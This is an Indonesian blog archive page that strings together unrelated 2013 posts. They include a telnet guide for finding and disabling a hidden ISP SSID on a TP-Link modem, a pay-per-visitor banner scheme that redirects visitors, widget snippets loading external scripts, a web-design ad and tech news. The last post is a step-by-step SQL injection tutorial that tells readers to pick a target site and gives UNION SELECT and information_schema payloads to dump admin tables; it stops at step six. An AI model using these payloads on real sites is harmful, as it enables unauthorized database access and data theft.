Kamis, 25 Juli 2013

Perintah Wifi.id

Sejak pertengahan tahun 2012 lalu, Telkom Speedy sangat gencar mempromosikan Speedy dengan memberikan Modem Wifi gratis. Selain promosi speedy saat itu, Telkom juga ternyata sedang gencar memperkenalkan @wifi.id
Penjelasan tentang program @wifi.id bisa dilihat disini
Hanya saja sangat disayangkan, promosi dan distribusi jaringan @wifi.id ini dilakukan oleh Telkom dengan memanfaatkan modem Speedy ADSL+ Wireless pengguna/pelanggan telepon rumah  yang umumnya tanpa sepengetahuan dan izin dari pelanggan. Modem ADSL+Wireless ini didapat dari TELKOM saat akan berlangganan Internet SPEEDY. Modem ADSL+Wireless ini sudah dimodifikasi firmware dan rom-nya oleh pihak Telkom, sehingga selain memancarkan sinyal wireless khusus pengguna (nama wireless/SSID dapat di ubah/setting sendiri oleh pengguna), tetapi juga memancarkan sinyal wireless untuk publik lainnya dengan nama jaringan wireless atau SSID @wifi.id, beberapa modem juga pernah memancarkan SSID lainnya spt GROOVIA, @Speedy dan bahkan Hidden SSID..
Terus apa saja permasalahannya ? Hmm, yang pasti banyak! Saya coba jelaskan beberapa hal diantaranya:
  1. Bandwidth internet tidak dapat maksimal  digunakan oleh pelanggan Speedy
    Bandwidth line ADSL yang pengguna terima umumnya terbatas, sekitar 1-1.3Mbps (setidaknya data ini untuk pengguna ADSL yang saya amati, meskipun mungkin ada pelanggan yang berlangganan 3Mbps), jika line ADSL ini digunakan bersama antara pengguna SSID private (pemilik/pelanggan) dengan pengguna umum lain (SSID @wifi.id), maka otomatis bandwidth yang seharusnya diterima oleh pelanggan Speedy akan terkurangi oleh pengguna lain.
  2. Jumlah user wireless terbatas.
    Modem ADSL+Wireless yang didistribusikan (dimodifikasi) oleh Telkom kepada pengguna umumnya ber-merk TP-Link seperti yang ada disini. Secara umum modem wireless tersebut memiliki keterbatasan maksimal client yang terhubung bersamaan. Dari datasheet dan informasi faq disebut hanya sekitar maksimal 24 client secara simultan. Bayangkan jika lokasi jaringan wireless Speedy Anda ternyata berada dekat dengan keramaian (pusat perbelanjaan/pertokoan atau bahkan kos-kosan/dll), ini akan membuat jaringan wireless kita menjadi tidak reliable, apalagi jika kita memiliki banyak pengguna sendiri.
  3. Menjadi ancaman keamanan intranet/internet.
    Konfigurasi wireless dengan Multi-SSID, tanpa adanya pengelolaan VLAN ID yang benar (biasanya dapat dikombinasikan dengan switch manageable), maka memungkinkan kesalahan managemen broadcast domain jaringan. Seperti konfigurasi multi-SSID yang digunakan pada Modem ADSL Wireless yang didistribusikan oleh Telkom. Jaringan Wireless dengan SSID @wifi.id yang bersifat open network dan tidak memiliki proteksi enkripsi, maka setiap client public (umum) yang terhubung ke SSID @wifi.id, maka otomatis sudah masuk ke internal jaringan Modem Wireless itu sendiri , karena dalam satu broadcast domain (VLAN). Sehingga akses ke sistem otentikasi administrasi Modem ADSL + Wireless bisa dilakukan, seperti akses web administration http, telnet, tftp dst yang memang dapat diakses dari LAN. Jika tidak dilakukan proteksi yang baik (seperti password yang aman/tidak mudah ditebak/tidak ada dikamus, disable tftp, disable FTP atau TELNET dst) maka para hacker dapat dengan mudah mendapatkan akses administrative ke modem tersebut. Bahkan memungkinkan juga untuk mengakses jaringan intranet jaringan dengan SSID yang dibuat oleh pengguna/pelanggan.Jika pernah membaca tulisan saya sebelumnyadisini  tentang backdoor account yang dibuat oleh pihak Telkom serta resikonya, maka tidak tertutup kemungkinan juga akses administrasi ke modem lebih mudah.Untuk menanggulangi atau menonaktifkan/mengubah konfigurasi modem wireless sehingga tidak memancarkan SSID yang dibuat pihak telkom (spt @wifi.id dll) dan kemungkinan adanya backdoor lain dapat mengikuti langkah langkah dibawah ini.
# telnet 192.168.1.1 # ip modem/router/gateway biasanya 192.168.1.1
Password: ***** # masukkan password admin cpe, defaultnyaadmin jika belum diganti
Copyright (c) 2001 – 2012 TP-LINK TECHNOLOGIES CO.,LTD.
TP-LINK>
# Note 1. :
( Beberapa perintah-perintah berikutnya dibawah ini merupakan perintah-perintah yang diperoleh dari dokumen bersifat rahasia (confidential) dari produsen chipset modem/wireless)
Untuk menampilkan konfigurasi wireless SSID pertama (ke-1) merupakan SSID wifi yang disetup pengguna/pelanggan , konfigurasi SSID ini juga dapat di ubah lewat GUI (Web Based) modem wireless.
TP-LINK>  rt rtdisplay 1
 ** Wlan Info  
 Ssid Wireless-Rumxxx
 Channel 1  
 Auth Mode Wpa2psk  
 Encryp Type tkipaes  
 Active 1  
 Rts Threshold 2347  
 Fragment Threshold 2346  
 Default Key   2  
 WPA-PSK Key xxxxxxxxxx  
 DtimPeriod   1  
 BeaconPeriod 100  
 AccessControlList.Policy [0]=DISABLE [1]=ALLOW [2]=REJECT    :0  
 WlanExt->Active 1  
 WlanExt->securityOptions 0  
 WlanExt->AuthMode 7  
 WlanExt->EncryMode  8  
 WlanExt->EncryKeyId  0  
 WlanExt->EncryOnOff  0  
 WlanExt->rtsThreshold  2347  
 WlanExt->fraThreshold  2346  
 WlanExt->channId   0  
 WlanExt->ssid  Wireless-Rumxxx 
 WlanExt->dtim  1  
 WlanExt->bgProtection  144  
 WlanExt->BeaconInterval  100  
 WlanExt->FilterEnable  0  
 WlanExt->FilterMethod  0  
 WlanExt->magic_num  3390  
 WlanExt->(wmm)  Enable  
 QID_AC_BE=0 
 QID_AC_BK=0 
 QID_AC_VI=0 
 QID_AC_VO=0 
 WMM  Enable  
 IGMP Snoop  Disable  
 WlanExt->(wmm)  Enable  
 WlanExt->(igmpsnoop)  Disable  
 MAC Address  647002ac87f8 
 WscEnrolleePinCode: xxxxx007
 MacTab.fAnyStationInPsm=FALSE 
 MacTab.McastPsQueue #=0 
Txd index[0] has 63 free 
Txd index[1] has 63 free 
Txd index[2] has 63 free 
Txd index[3] has 63 free 
Free Mgmt number = 127 
0 Rxd has been used!
polling_interrupt_mode = 1  (1 :interrupt mode; 0: Polling mode 

WLANEthernetQueue Lenth = 0 
Driver version-2.5.0.2
Untuk menampilkan konfigurasi wireless SSID kedua (ke-2) merupakan SSID “@wifi.id” yang dicreate oleh Telkom, konfigurasi SSID ini tidak dapat dilihat atau diubah melalui GUI (Web Based) modem wireless karena firmwarenya sudah di modifikasi.
TP-LINK>  rt rtdisplay 2 
 ** Wlan Info  
 Ssid @wifi.id  
 Channel 1  
 Auth Mode open  
 Encryp Type none  
 Active 1  
 Rts Threshold 2347  
 Fragment Threshold 2346  
 Default Key   1  
 WPA-PSK Key   
 DtimPeriod   1  
 BeaconPeriod 100  
 AccessControlList.Policy [0]=DISABLE [1]=ALLOW [2]=REJECT    :0  
 WlanExt->Active 1  
 WlanExt->securityOptions 0  
 WlanExt->AuthMode 0  
 WlanExt->EncryMode  1  
 WlanExt->EncryKeyId  0  
 WlanExt->EncryOnOff  0  
 WlanExt->rtsThreshold  2347  
 WlanExt->fraThreshold  2346  
 WlanExt->channId   6  
 WlanExt->ssid  @wifi.id  
 WlanExt->dtim  1  
 WlanExt->bgProtection  0  
 WlanExt->BeaconInterval  100  
 WlanExt->FilterEnable  0  
 WlanExt->FilterMethod  0  
 WlanExt->magic_num  3390  
 WlanExt->(wmm)  Enable  
 QID_AC_BE=0 
 QID_AC_BK=0 
 QID_AC_VI=0 
 QID_AC_VO=0 
 WMM  Enable  
 IGMP Snoop  Disable  
 WlanExt->(wmm)  Enable  
 WlanExt->(igmpsnoop)  Disable  
 MAC Address  647002ac87f9 
 WscEnrolleePinCode: 13070007
 MacTab.fAnyStationInPsm=TRUE 
 MacTab.McastPsQueue #=0 
Txd index[0] has 63 free 
Txd index[1] has 63 free 
Txd index[2] has 63 free 
Txd index[3] has 63 free 
Free Mgmt number = 127 
0 Rxd has been used!
polling_interrupt_mode = 1  (1 :interrupt mode; 0: Polling mode 

WLANEthernetQueue Lenth = 0 
Driver version-2.5.0.2 
Untuk menampilkan konfigurasi wireless SSID ketiga dan keempat dapat menggunakan perintah:
TP-LINK> rt rtdisplay 3
TP-LINK> rt rtdisplay 4
Umumnya SSID ke-3 dan ke-4 masih kosong, tetapi pada beberapa modem wireless, SSID ke-3 ada yang berstatus mode hidden (SSID tersembunyi).
Cara lain untuk menampilkan konfigurasi multi-SSID sekaligus dapat merubah setting masing masing SSID sbb:
Untuk menampilkan SID pertama (ke-1) merupakan SSID wifi yang disetup pengguna/pelanggan , konfigurasi SSID ini juga dapat di ubah lewat GUI (Web Based) modem wireless.
TP-LINK> rt node index 1 
TP-LINK> rt node display
WLAN index:1 
WLAN CountryRegion:1 
WLAN CountryChannel:40 
WLAN SSID:Wireless-Rumxxxxx
WLAN WirelessMode(0-11b/g mixed,1-11b only,4-11g only,6-11n_2_4G,7-11gn mixed,9-11bgn_mixed,11-11n_5G):9 
WLAN txRate:0 
WLAN channel:0 
WLAN BeaconPeriod:100 
WLAN BGProtection(0-Auto,1-Always on,2-Always off):0 
WLAN TxPreamble:(0-Long Preamble,1-Short Preamble,2-Auto)0 
WLAN RtsThresh:2347 
WLAN FragThresh:2346 
WLAN TxBurst(0-disable,1-enable):0 
WLAN NoForwarding(0-disable,1-enable):0 
WLAN Max Station Number :0 
WLAN bHideSsid(0-disable,1-enable):0 
WLAN ShortSlot(0-disable,1-enable):1 
WLAN OpMode:6 
WLAN Auth Mode wpa2psk  
WLAN Encryp Type tkipaes  
WLAN DefaultKeyId:2 
WLAN key 1 0x  
WLAN key 2 0x  
WLAN key 3 0x  
WLAN key 4 0x  
Rekey Method (0-time,1-pkt,2-disable):2
Rekey Interval :0xe10
WLAN policy(0-disable,1-allow,2-reject):0 
WLAN AccessControlList:
WLAN wpapsk:xxxxxxxxxxxxx
WLAN StaIdleTimeout:300
TP-LINK>
Untuk menampilkan konfigurasi SSID ke-2 (@wifi.id) dst
TP-LINK> rt node index 2 
TP-LINK> rt node display
WLAN index:2 
WLAN CountryRegion:1 
WLAN CountryChannel:40 
WLAN SSID:@wifi.id 
WLAN WirelessMode(0-11b/g mixed,1-11b only,4-11g only,6-11n_2_4G,7-11gn mixed,9-11bgn_mixed,11-11n_5G):9 
WLAN txRate:0 
WLAN channel:0 
WLAN BeaconPeriod:100 
WLAN BGProtection(0-Auto,1-Always on,2-Always off):0 
WLAN TxPreamble:(0-Long Preamble,1-Short Preamble,2-Auto)0 
WLAN RtsThresh:2347 
WLAN FragThresh:2346 
WLAN TxBurst(0-disable,1-enable):0 
WLAN NoForwarding(0-disable,1-enable):0 
WLAN Max Station Number :0 
WLAN bHideSsid(0-disable,1-enable):0 
WLAN ShortSlot(0-disable,1-enable):1 
WLAN OpMode:0 
WLAN Auth Mode open  
WLAN Encryp Type none  
WLAN DefaultKeyId:1 
WLAN key 1 0x  
WLAN key 2 0x  
WLAN key 3 0x  
WLAN key 4 0x  
Rekey Method (0-time,1-pkt,2-disable):2
Rekey Interval :0xe10
WLAN policy(0-disable,1-allow,2-reject):0 
WLAN AccessControlList:
WLAN wpapsk: 
WLAN StaIdleTimeout:300 
Untuk merubah SSID yang ke-2 dst
TP-LINK> rt node index 2 
TP-LINK> rt node ? 
index           countryregion   countrychannel  ssid               
wirelessmode    txrate          channel         beaconperiod       
bgprotection    txpreamble      rtsthreshold    fragthreshold      
dtimperiod      txburst         noforwarding    maxstanum          
hidessid        shortslot       authmode        encryptype         
defaultkeyid    key             rekeymethod     rekeyinterval      
accesspolicy    acladdentry     wpapsk          save               
display         shortcut               
TP-LINK> rt node ssid “SSID-Baru”                # Mengubah SSID @wifi.id menjadi SSID-Baru
TP-LINK> rt node authmode wpapsk
TP-LINK> rt node encryptype 
Usage: rt node enc <none|wep64|wep128|tkip|aes>
TP-LINK> rt node encryptype  aes
TP-LINK> rt node wpapsk <passphrase>     #Kunci untuk masuk SSID-Baru
TP-LINK> rt node save  # Simpan konfigurasi ke rom
TP-LINK> rt node display # Verifikasi konfigurasi
Beberapa perintah lainnya 
TP-LINK> rt disableap  # Disable Wireless 
TP-LINK> rt enableap  # Enable Wireless 
TP-LINK> rt node index <1-4> # select WLAN configuration
TP-LINK> rt node display # display selected index configuration
TP-LINK> rt node hidessid <0/1>
TP-LINK> rt node wirelessmode <0-11> # (0-11b/g mixed,1-11b only,4-11g only,6-11n_2_4G,7-11gn mixed,9-11bgn_mixed,11-11n_5G)
TP-LINK> rt node authmode <wepauto|open|shared|wpapsk|wpa2psk|wpa|wpa2|wpa1wpa2|wpapskwpa2psk|waicert|waipsk>
TP-LINK> rt node encryptype <none|wep64|web128|tkip|aes|tkipaes>
TP-LINK> rt node wpapsk 
TP-LINK> rt node accesspolicy <0-2> # ACL for this SSID (0-disable,1-allow following MACs,2-reject following MACs)
TP-LINK> rt node acladdentry ma:ca:dd:re:ss:01;ma:ca:dd:re:ss:02;… # set the ACL (full replace, not add), to empty use “”
TP-LINK> rt node save # save modified config
Perintah-perintah selengkapnya dapat didownload disini  (berhubung dokumen ini katanya bersifat confidential, sementara hanya saya izinkan download untuk kalangan terbatas, silahkan request ke email saya yang tercantum pada halaman kontak. Hendaknya menggunakan Nama Asli dan info lainnya yang  menunjukkan identitas asli spt email kantor, website/blog pribadi untuk merequest dokumen tersebut, jika menggunakan nama samaran tidak akan dilayani)
Demikian sedikit tulisan tentang hebohnya @wifi.id pada modem ADSL Wireless dan cara merubah konfigurasi modem wireless didapat dari Telkom tersebut, sehingga tidak perlu kuatir adanya penyalahgunaan akses ke modem kita yang memang tidak kita inginkan diakses oleh kalangan lain. Disamping cara diatas, perlu juga memperhatikan konfigurasi modem adsl + wireless agar hanya dapat diakses dari lokal LAN atau PC tertentu saja dan oleh administrator dengan mengikuti tutorial saya sebelumnya pada halamanhttp://josh.rootbrain.com/blog/2012/04/03/backdoor-modem-speedy/
Selain cara manual (dengan telnet) merubah konfigurasi diatas, cara lain yang tidak kalah efektif adalah mengganti firmware dan rom bawaan modem dengan firmware yang disediakan oleh vendor (TP-Link), bisa di download disini
Jika ada pertanyaan atau komentar silahkan mengisi pesan dibawah.
Semoga bermanfaat. Terimakasih.

@update
Untuk mendisable fitur MultiSSID  atau hanya mengaktifkan 1 SSID saja pada Modem Wireless TP-Link dapat dilakukan melalui perintah :
rt setbssidnum 1
Jika hanya ingin mengaktifkan 2 atau 3 atau 4 SSID
rt setbssidnum 2|3|4
Setelah perintah dieksekusi, maka Modem Wireless akan reboot dan hanya mengaktifkan jumlah SSID yang kita setting diatas

@update pukul 15.38 WIB 16 Jan 2013
Untuk mencegah terkonfigurasi ulang oleh pihak Provider  melalui proses sinkronisasi konfigurasi  TR-069  (Technical Report 069) atau protokol CWMP(CPE WAN Management Protocol). Ada baiknya semua account ACSnya dihapus beserta VPI/VCInya untuk ACSnya didisable :) .  CWMP dan TR-069 masih memungkinkan provider merubah konfigurasi pada Modem kita.

Rabu, 24 Juli 2013

Pasang Banner DI blog Langsung Dibayar


udah tau apa itu Paid To Promot kan cuy? Kalau belum selengkapnya sobat bisa baca di Dapat Dollar Di Blog Hanya Pasang Banner. Sederhanya Paid To Promote itu merupakan bisnis yang membayar dari jumlah pengunjung yang datang ke blog sobat. Jadi setiap ada kunjungan / visitor ke blog sobat akan dibayar dengan dollar. Pengunjung yang dihitung yaitu dari negara :
United States, Canada, Australia, United Kingdom, Germany, New Zealand, Argentina, Brazil, Mexico, India, Malaysia, Philippines, Thailand, Singapore, Vietnam, Belgium, Chile, Colombia, Denmark, Spain, France, Italy, Netherlands, Peru, Portugal, Sweden, Viet Nam, South Africa, Saudi Arabia, Czech Republic, Cyprus, Greece.
Kalau dari indonesia gimana sob?.
gak dibayar kawan. Mereka hanya menghitung dari negara di atas saja. Biasanya yang bayaran cukup besar jika pengunjung datang dari United States, Canada, Australia, United Kingdom.
Berapa kita dibayar setiap satu penjung?.
Tidak pasti cuy. semuanya tergantung asal negara pengjung, dan berapa lama mereka berkunjung.
Bagaimana cara kerja bisnis ini kawan? . 
Biasanya setiap pengjung dari negara diatas akan timbul Pop Up sebagai media iklan mereka. Dan juga redirect.
Apa kerugian dari bisnis ini ?
Yang paling merugikan dari bisnis ini yaitu kebanyakan kalau pengunjung yang datang dari negara diatas akan langsung redirect ke situs iklan mereka. Jadi sederhanya pengunjung akan langsung dibawa ke situs iklan setelah mengujung blog kita secara otomatis. Jadi sebaiknya kalau blog sobat ada penjualan/layanan/bisnis sebaiknya jangan gunakan ini, karena nanti blog sobat akan jarang pengunjung dari luar yang baca, karena redirect.
Apa keuntungan dari bisnis ini ?
1. Mudah dalam memasang Banner / Code.
2.Pembayaran secara otomatis setiap bulan pada tanggal 15 dan 30 ke Paypal atau Alertpay dan Webmoney.
3. Akun Paypal tidak Harus Verified (Buktinya saya sendiri), Kalau mau daftar paypal baca di Sini.
3. Sangat banyak potensi dapat dollar, karena visitor yang diterima sangat banyak, ada sekitar 34 Negara.
4. Tidak perlu kerja apa-apa, karena hanya pasang banner.
Apa buktinya cuy kalau memang bisnis ini OKE?
Ini kawan bukti pembayara yang baru beberapa jam yang lalu dikirim ke email saya : Klik Untuk Memperbesar.

Itu bukti pembayaran yang diinformasikan ke email. Kalau dari paypalnya langsung saya tidak bisa ambil (Kwatir buka Paypal nanti Limit Account soalnya IP Modem saya berubah-ubah saya sudah pernah kena LIMIT jadi kapok, hehehe)
Gimana kawan tertarik?
Silahkan daftar. Untuk daftar silahkan Klik Link berikut :
Atau klik banner berikut untuk daftar.

Widget I Love Indonesia


Widget i love indonesia di pojok blog


Masih di Variasi Blogger share Widget i love indonesia di pojok blog cekidot

Silahkan sobat pilih dan Copy Paste script  di bawah ini simpan di blog sobat

Posisi Pojok kanan atas


<a href=http://variasiblogger.blogspot.com/2011/12/widget-i-love-indonesia-di-pojok-blog.html style="display:scroll;position:fixed;top:5px;right:5px;"><img src="http://i1187.photobucket.com/albums/z389/RICKY_ALDIYANSYAH/iluvindonesia.png"/></a>

posisi pojok kanan bawah

<a href=http://variasiblogger.blogspot.com/2011/12/widget-i-love-indonesia-di-pojok-blog.html style="display:scroll;position:fixed;bottom:5px;right:5px;"><img src="http://i1187.photobucket.com/albums/z389/RICKY_ALDIYANSYAH/iluvindonesia-kananbawah.png"/></a>

posisi pojok kiri atas

<a href=http://variasiblogger.blogspot.com/2011/12/widget-i-love-indonesia-di-pojok-blog.html style="display:scroll;position:fixed;top:5px;left:5px;"><img src="http://i1187.photobucket.com/albums/z389/RICKY_ALDIYANSYAH/iluvindonesia-kiriatas.png"/></a>

posisi pojok kiri bawah

<a href=http://variasiblogger.blogspot.com/2011/12/widget-i-love-indonesia-di-pojok-blog.html style="display:scroll;position:fixed;bottom:5px;left:5px;"><img src="http://i1187.photobucket.com/albums/z389/RICKY_ALDIYANSYAH/iluvindonesia-kiribawah.png"/></a>

Untuk penyimpanan kode script di atas dengan cara silahkan log in terlebih dahulu di blog sobat >> klik Rancangan >> klik ADD Gadget >> klik HTML/Javascript , kemudian paste salah satu script diatas , simpan dan lihat hasilnya semoga bermanfaat.
source:variasibloggeeer.blogpot.com

Widget Blogger Indonesia

BLITAR -Kali ini saya akan memberikan kembali tutorial mudah memasang widget menarik di blog anda, yaitu Widget Blogger Indonesia yang berguna untuk mempercantik sekaligus mengukuhkan bahwah kita bangga menjadi warga negara Indonesia.

Cara Memasang Widget Blogger Indonesia :

1. Login blog
2. Ke bagian tata letak lalu tambah widget HTML/Javascript
3. Copy paste kode script dibawah ini

Untuk Memasang Widget di bagian Kiri Atas :


<script language="JavaScript" src="http://indonesia1.googlecode.com/files/indonesia1.txt" type="text/javascript"> </script> <script language="JavaScript" type="text/javascript"> cot("https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_n_D74DPVnDP-psCMZ83JAi6jvQNvV4qgSL8P-TIihqDGtH9H7D5fY-67VOX78IN0jS3we7TXNeO5WHcLLMnslQQzQbIWBgeMmTvmVXXEr3jWnl0sLLfcBeoa5CSH7PMeECZl-SpOuVPs/s1600/indonesia1.png")</script>

Untuk Memasang Widget di bagian Kanan Atas :


<script language="JavaScript" src="http://indonesia2.googlecode.com/files/indonesia2.txt" type="text/javascript"> </script> <script language="JavaScript" type="text/javascript"> cot("https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXvco3g0GpsvgfGCFvsjqM6mYsgNZlRkhzswCfMG14sFCG0a2sK7Z3v9QKDay-hCEvti5YzyAXNuYxwyeNuBj32L3NXPHQbzZkGgwoVYvcLNO9RsSwgnRDRj9KiQXKBnDEnu4RHjIzFwg8/s1600/indonesia2.png")</script>

Untuk Memasang Widget di bagian Kiri Bawah :


<script language="JavaScript" src="http://indonesia3.googlecode.com/files/indonesia3.txt" type="text/javascript"> </script> <script language="JavaScript" type="text/javascript"> cot("https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7k1bnccuPlB7eGeW2UTQFNaed_Nnx74OStptDu2djJHALow632rXm2-vMhsWGSbDVAgErFg3gMKzcSDGZp02Skgr2J_XdendIODfRzkF9EFQOqSpBJxntPnDFfJvROQKD8kuk-3NBnmfI/s1600/indonesia3.png")</script>

Untuk Memasang Widget di bagian Kanan Bawah :


<script language="JavaScript" src="http://indonesia4.googlecode.com/files/indonesia4.txt" type="text/javascript"> </script> <script language="JavaScript" type="text/javascript"> cot("https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7k1bnccuPlB7eGeW2UTQFNaed_Nnx74OStptDu2djJHALow632rXm2-vMhsWGSbDVAgErFg3gMKzcSDGZp02Skgr2J_XdendIODfRzkF9EFQOqSpBJxntPnDFfJvROQKD8kuk-3NBnmfI/s1600/indonesia3.png")</script>

Jasa Pembuatan Web Site

kini memiliki sebuah Website & Blog menjadi hal umum dan saya rasa perlu dimiliki oleh banyak orang, apalagi yang sering berkecimpung didunia maya, apakah untuk urusan bisnis atau sebuah website pribadi.

Jadi disini, di blog www.blitar.asli.ws, saya sebagai adminnya juga membuka layanan jasa pembuatan website, mungkin untuk saat ini saya hanya menyediakan pembuatan website pribadi, dan profil perusahaan saja. dan untuk sekarang juga hanya menggunakan Aplikasi CMS dari Wordpress karena lebih SEO dan lebih mudah terindex Google .

Selain jasa pembuatan website, untuk hal yang lebih kecil. Saya juga menyediakan jasa layanan pembuatan blog berplatform blogger.com ,wordpress.com.
Pada layanan pembutan blog ini agan bisa membuat prototype template yang dinginkan melalui gambar, atau saya sendiri yang mendesain agan sesuai yang anda inginkan.

Untuk masalah biaya sangat terjangkau sekali harganya dan yang pasti jasa dari saya tidak membebani kantong anda. Dengan saya anda bisa menerima hasil yang saya buat dulu (Belum Memberikan Passwor & Emailnya) kemudian baru dibayarkan.

Masalah pembayaran Web & Blog sangat mudah sekali dan saya juga tidak membebani anda dalam membayar hasil Buatan saya dan untuk pembayar anda juga bisa mneggunakan Via PULSA , Via PAYPAL.

Jadi bagi yang memiliki rencana berbisnis dengan saya atau sekedar ingin menanyakan lebih lanjut lagi agan agan bisa komentar di kotak komentar atau menghubungisaya Via :
Handphone : Rizki 087756436962




kini memiliki sebuah website menjadi hal umum dan saya rasa perlu dimiliki oleh banyak orang, apalagi yang sering berkecimpung didunia maya, apakah untuk urusan bisnis atau sebuah website pribadi. Jadi disini, di blog ariswildan, saya sebagai adminnya juga membuka layanan jasa pembuatan website, mungkin untuk saat ini saya hanya menyediakan pembuatan website pribadi, portal berita, dan profil perusahaan saja. dan untuk sekarang juga hanya menggunakan cms wordpress saja. selanjutnya mungkin juga menggunakan cms joomla, drupal dan lainnya. dan jika sukses, kedepannya bisa saja saya kembangkan cms buatan sendiri, Selain jasa pembuatan website, untuk hal yang lebih kecil. Saya juga menyediakan jasa layanan pembuatan blog berplatform blogger.com ,wordpress.com , webs.com dll. Pada layanan pembutan blog ini agan bisa membuat prototype template yang dinginkan melalui gambar, atau saya sendiri yang mendesain agan sesuai yang anda inginkan. Untuk masalah biaya, saya sendiri belum berani mematok harganya langsung disini, hal tersebut bisa dibicarakaan lebih lanjut lagi via email. Dan yang pasti jasa dari saya tidak membebani kantong anda. Dengan saya anda bisa menerima hasil yang saya buat dulu kemudian baru dibayarkan. Atau mingkin terkadang saya berikan jasa tersebut gratis atau dengan ongkos ke warnet saja. Semuanya bisa dibicarakan nanti. Jadi bagi yang memiliki rencana berbisnis dengan saya atau sekedar ingin menanyakan lebih lanjut lagi agan agan bisa komentar di kotak komentar

Read more at: http://ariswildan.blogspot.com/p/blog-page_26.html
Di Mohon Buat Sobat Yang Mengcopy Paste Artikel Ini Tolong Di Cantumkan SumberNya Artikel Yaa!!.::. Thanks Bro !!!...

Google Umumkan Android 4.3

24 Juli, Google Akan Umumkan Android 4.3
Google telah menyebarkan undangan untuk siaran pers pada 24 Juli 2013 dengan pimpinan Android dan pimpinan Chrome sebagai pembicara. Acara dimulai pada pukul 09.00 waktu setempat dan bisa juga disaksikan secara live di YouTube.

Acara itu akan diselenggarakan di DogPatch Studios, San Francisco. Sundar Pichai, yang telah mengawasi pengembangan sistem operasi Android, juga akan hadir dalam acara itu.

Belum jelas pembahasan yang akan dibicarakan Google nantinya. Sebab, isi undangan yang dikirimkan Google sangat singkat.

Diduga dalam acara tersebut Google akan mengungkap tentang Android 4.3. Sebab, perusahaan yang berkantor pusat di California itu belum kembali meluncurkan versi baru sistem operasi Android sejak diselenggarakan konferensi pengembang Google pada Mei 2013 lalu.

Prediksi lainnya, kemungkinan Google juga akan mengumumkan tentang Motorola Moto X. Ponsel cerdas itu telah dipasarkan dalam iklan media cetak. Bahkan, bos Google, Eric Schmidt, baru-baru ini terlihat menggunakan ponsel Motorola Moto X itu. Akan tetapi, Google sampai sekarang belum mengumumkan secara resmi tentang handset baru itu beserta spesifikasinya.
source:asalasah.blogpot.com

Windows 8.1 Resmi Dirilis

Ada kabar terbaru buat kamu si pecinta Windows. Ya, microsoft sudah memperkenalkan Windows 8.1 secara resmi kepada publik. Dan kabarnya, update-an ter-anyar windows itu sudah akan dirilis pada akhir tahun ini 2013.
tech-windows-8-1
Beberapa perangkat tambahan seperti boot-to-desktop akan hadir disana. Akan ada pula layanan musik Xbox yang sudah berkompeten untuk membuat folder sendiri berdasarkan artis, album, atau lagu tertentu.
Layanan search nya pun katanya akan mencari lebih dalam hard drive dan SkyDrive mu (emang iya ya? Entahlah).
Tapi yang jelas-jelas terlihat, tombol ‘start’ yang terletak di pojok kiri bawah -yang menjadi ikon windows- akan kembali dihadirkan, setelah pada windows 8 dihilangkan.
Berikut adalah preview nya.

source:langittberita..com

SQL Injection


SQL Injection merupakan salah satu cara hack websiten dengan aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data. 


Yang perlu di ketahui sebelum sql injection pada mysql: 
karakter: ' atau - 
comments: /* atau -- 
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x 

=========== 
=step Satu:= 
=========== 

carilah target 
misal: [site]/berita.php?id=100 

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error. 
contoh: 
Code: 
[site]/berita.php?id=100' atau 
[site]/berita.php?id=-100 

sehingga muncul pesan error seperti berikut (masih bnyak lagi): 


========== 
=step Dua:= 
========== 

mencari dan menghitung jumlah table yang ada dalam databasenya... 
gunakan perintah : order by 

contoh: 
Code: 
[site]/berita.php?id=-100+order+by+1-- atau 
[site]/berita.php?id=-100+order+by+1/* 

ceklah secara step by step (satupersatu)... 
misal: 
Code: 
[site]/berita.php?id=-100+order+by+1-- 
[site]/berita.php?id=-100+order+by+2-- 
[site]/berita.php?id=-100+order+by+3-- 
[site]/berita.php?id=-100+order+by+4-- 

sehingga muncul error atau hilang pesan error... 
misal: [site]/berita.php?id=-100+order+by+9-- 

berarti yang kita ambil adalah sampai angka 8 
menjadi [site]/berita.php?id=-100+order+by+8-- 


=========== 
=step Tiga:= 
=========== 

untuk mengeluarkan angka berapa yang muncul gunakan perintah union 
karena tadi error sampai angka 9 
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8-- 

ok seumpama yg keluar angka 5 

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi 
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau 
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8-- 

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema.. 

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema.. 


=========== 
=step Empat:= 
=========== 

untuk menampilkan semua isi dari table tsb adalah 
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi 
perintah +from+information_schema.tables+where+table_schema =database() >>> dimasukan setelah angka terakhir 

Code: 
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name), 6,7,8+from+information_schema.tables+where+table_s chema=database()-- 

============= 
= step Lima: = 
============= 

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi 
perintah +from+information_schema.columns+where+table_name= 0xhexa-- >>> dimasukan setelah angka terakhir 

Code: 
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0xhexa-- 

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya 
website yg digunakan untuk konversi :http://soai.forumotion.com/ascii-h1.htm 

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E 

Code: 
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0x61646D696E-- 

============ 
=step Enam:= 
============ 

